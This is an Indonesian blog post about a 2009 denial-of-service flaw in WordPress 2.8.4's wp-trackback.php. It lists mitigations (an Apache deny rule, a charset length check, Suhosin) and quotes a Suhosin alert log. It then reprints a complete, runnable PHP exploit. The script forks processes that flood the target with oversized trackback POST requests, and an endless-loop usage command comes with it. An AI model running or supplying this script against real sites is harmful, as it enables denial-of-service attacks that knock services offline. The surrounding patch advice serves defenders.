Kabar yang saya dapat dari tred ini bahwa telah ditemukan exploit pada wordpres 2.8.4. Exploit ini sifatnya DOS (Denial Of Service) yaitu dengan melakukan pengiriman paket data secara terus menerus sehingga mengakibatkan sever kelebihan beban. Exploit ini memanfaatkan kelemahan wp-trackbacks.php.
Solusi
–solusi 1 terbuburuk–
tambahkan rules di konfigurasi apache (httpd.conf) baris berikut
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
–solusi 2 –
pada baris ke #47 wp-trackback.php tambahkan
if(strlen($charset) > 50)
die;
–solusi 3 –
silahkan install suhosin, karena dari hasil test suhosin kurang lebih terbukti bisa memblokir serangan tsb
berikut hasil log suhosin :
Oct 21 12:17:27 server suhosin[26063]: ALERT – configured request variable value length limit exceeded – dropped vari able ‘title’ (attacker ’64.243.53.34′, file ‘/home/domainku/domains/domainku.com/public_html/wp-trackback.php’)
berikut script Eksploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | <?php /* * wordpress Resource exhaustion Exploit * http://rooibo.wordpress.com/ * security@wordpress.org contacted and get a response, * but no solution available. * * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org * * exploiting: * you must install php-cli (command line interface) * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done * */ if(count($argv) < 2) die("You need to specify a url to attack\n"); $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.\n"); $path = (count($data)==2)?"":$data['path']; $path = trim($path,'/').'/wp-trackback.php'; if($path{0} != '/') $path = '/'.$path; $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b); $charset = ""; $charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset); $str .= '&url=www.example.com'; $str .= '&title='.$b; $str .= '&blog_name=lol'; $str .= '&excerpt=lol'; for($n = 0; $n <= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."\n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: ".$data['host']."\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ".strlen($str)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $str."\r\n\r\n"); echo "hit!\n"; } } ?> |
Sumber :
http://www.diskusiwebhosting.com/showthread.php?t=1784
http://jarraltech.com/2009/10/new-0-day-wordpress-exploit/
Incoming search terms for the article:
- 0day exploit
- wordpress exploit
- exploit wordpress
- configured request variable name length limit exceeded
- wordpress 2 8 4 exploit
- bagaimana mencegah ddos di wordpress
- hack wordpress 2 8 4
- new php proxy
- Powered by WordPress 2 8 4
- powered by wordpress exploit hacker
Related posts:
- Installatron Upgrade WordPress 2.8.5 Fix DOS 0-day exploit Segera upgrade wordpress anda melalui installatron dari versi 2.8.4 ke...
- Directadmin Roundcube Exploit ditemukan Pengguna DA segera update Bagi yang menggunakan hosting panel directadmin dan melakukan upgrade sebelum...
- Cara Jitu Migrasi WordPress antar Folder di Server Hosting Kadang sering terjadi kesalahan lokasi folder waktu melakukan installasi wordpress...
- Contact form jquery WordPress plugin Sebelumnya saya sudah memposting artikel yang sama yang bisa di...
Related posts brought to you by Yet Another Related Posts Plugin.
[...] ke 2.8.5. Upgrade wordpres bertujuan untuk menutup celah keamanan yang berhasil dimanfaatkan oleh 0-day Exploit melakukan DDOS pada [...]
terus berkarya mas hadi…
siap bos.